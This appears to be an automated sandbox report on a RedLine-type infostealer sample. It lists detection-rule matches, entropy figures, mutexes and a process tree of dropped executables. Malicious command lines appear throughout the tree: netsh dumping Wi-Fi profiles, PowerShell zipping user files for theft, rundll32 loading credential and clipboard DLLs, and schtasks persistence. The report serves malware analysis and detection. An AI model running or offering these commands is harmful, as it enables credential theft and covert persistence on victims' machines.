                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 2_2_00748EDB2_2_00748EDB
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 2_2_007447C82_2_007447C8
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 3_2_0074A2203_2_0074A220
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 3_2_007443303_2_00744330
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 3_2_007394E33_2_007394E3
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 3_2_00748DBB3_2_00748DBB
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 3_2_00704E603_2_00704E60
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 3_2_007486693_2_00748669
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 3_2_00748EDB3_2_00748EDB
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 3_2_007447C83_2_007447C8
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848CC77F811_2_00007FF848CC77F8
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeCode function: 14_2_003A680914_2_003A6809
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeCode function: 14_2_003A707B14_2_003A707B
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeCode function: 14_2_003660E014_2_003660E0
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeCode function: 14_2_003A24D014_2_003A24D0
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeCode function: 14_2_003A296814_2_003A2968
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeCode function: 14_2_0036CE0014_2_0036CE00
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeCode function: 14_2_003A7EB014_2_003A7EB0
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeCode function: 14_2_0036831014_2_00368310
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeCode function: 14_2_003A6F5B14_2_003A6F5B
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeCode function: 14_2_0039778014_2_00397780
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeCode function: String function: 00B99750 appears 122 times
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: String function: 00719750 appears 244 times
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: String function: 0071F620 appears 36 times
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5596 -s 2132
                              Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                              Source: 52.0.build12.exe.3c0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                              Source: 52.0.build12.exe.3c0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                              Source: 00000034.00000000.3328661632.00000000003C2000.00000002.00000001.01000000.00000018.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPEDMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPEDMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe, type: DROPPEDMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe, type: DROPPEDMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPEDMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPEDMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                              Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeStatic PE information: Section: ZLIB complexity 0.9975808478552279
                              Source: explorha.exe.0.drStatic PE information: Section: ZLIB complexity 0.9975808478552279
                              Source: amert[1].exe.6.drStatic PE information: Section: ZLIB complexity 0.9977240444214877
                              Source: amert[1].exe.6.drStatic PE information: Section: fbupybke ZLIB complexity 0.9944582206191764
                              Source: amert.exe.6.drStatic PE information: Section: ZLIB complexity 0.9977240444214877
                              Source: amert.exe.6.drStatic PE information: Section: fbupybke ZLIB complexity 0.9944582206191764
                              Source: random[1].exe0.6.drStatic PE information: Section: ZLIB complexity 0.9915700285291631
                              Source: c884f8452a.exe.6.drStatic PE information: Section: ZLIB complexity 0.9915700285291631
                              Source: sarra[1].exe.6.drStatic PE information: Section: ZLIB complexity 0.9915469146238377
                              Source: chrosha.exe.14.drStatic PE information: Section: ZLIB complexity 0.9977240444214877
                              Source: chrosha.exe.14.drStatic PE information: Section: fbupybke ZLIB complexity 0.9944582206191764
                              Source: RageMP131.exe.20.drStatic PE information: Section: ZLIB complexity 0.9915700285291631
                              Source: MPGPH131.exe.20.drStatic PE information: Section: ZLIB complexity 0.9915700285291631
                              Source: amert.exe.6.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                              Source: chrosha.exe.14.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                              Source: amert[1].exe.6.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                              Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@106/196@19/15
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeFile created: C:\Users\user\AppData\Roaming\a091ec0a6e2227Jump to behavior
                              Source: C:\Windows\System32\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\Global\SyncRootManager
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeMutant created: NULL
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4568:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2232:120:WilError_03
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeMutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7324:64:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7220:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2324:120:WilError_03
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeMutant created: \Sessions\1\BaseNamedObjects\c1ec479e5342a25940592acf24703eb2
                              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5596
                              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4012
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7292:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5516:120:WilError_03
                              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3436
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeFile created: C:\Users\user\AppData\Local\Temp\09fd851a4fJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeFile read: C:\Users\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                              Source: c884f8452a.exe, 00000014.00000003.2883884113.0000000005380000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000002.3269708121.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, MPGPH131.exe, 0000001C.00000003.2928548272.0000000004FB0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3244160511.0000000000891000.00000040.00000001.01000000.00000015.sdmp, MPGPH131.exe, 0000001D.00000002.3252023529.0000000000891000.00000040.00000001.01000000.00000015.sdmp, MPGPH131.exe, 0000001D.00000003.2928357410.0000000004E00000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000003.3049065543.00000000048F0000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000002.3145142996.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, RageMP131.exe, 0000002D.00000003.3127053365.0000000005330000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000002D.00000002.3204405230.0000000000371000.00000040.00000001.01000000.00000017.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                              Source: c884f8452a.exe, 00000014.00000003.2883884113.0000000005380000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000002.3269708121.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, MPGPH131.exe, 0000001C.00000003.2928548272.0000000004FB0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3244160511.0000000000891000.00000040.00000001.01000000.00000015.sdmp, MPGPH131.exe, 0000001D.00000002.3252023529.0000000000891000.00000040.00000001.01000000.00000015.sdmp, MPGPH131.exe, 0000001D.00000003.2928357410.0000000004E00000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000003.3049065543.00000000048F0000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000002.3145142996.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, RageMP131.exe, 0000002D.00000003.3127053365.0000000005330000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000002D.00000002.3204405230.0000000000371000.00000040.00000001.01000000.00000017.sdmpBinary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                              Source: rundll32.exe, 00000008.00000002.2871819933.000001E17AE8F000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2978212493.0000000007F0A000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3053135954.0000000007CC2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3029531974.0000000007CAC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3026186524.0000000007CAC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3035311559.00000000079E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                              Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeVirustotal: Detection: 54%
                              Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeReversingLabs: Detection: 50%
                              Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                              Source: explorha.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                              Source: explorha.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                              Source: amert.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe"
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeProcess created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                              Source: C:\Windows\System32\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess created: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe "C:\Users\user\AppData\Local\Temp\1000054001\amert.exe"
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess created: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe "C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
                              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess created: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe "C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
                              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
                              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5540 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5660 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8
                              Source: unknownProcess created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
                              Source: unknownProcess created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe "C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=1636,i,5624198576768077496,445941079671464976,262144 /prefetch:8
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3632 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe "C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5596 -s 2132
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3872 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4012 -s 2052
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3436 -s 1948
                              Source: unknownProcess created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe "C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1984,i,457568203381776828,11237095852378400144,262144 /prefetch:8
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe "C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe"
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe "C:\Users\user\AppData\Local\Temp\1000187001\build12.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeProcess created: C:\Windows\System32\conhost.exe
                              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeProcess created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, MainJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, MainJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess created: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe "C:\Users\user\AppData\Local\Temp\1000054001\amert.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess created: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe "C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess created: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe "C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"Jump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, MainJump to behavior
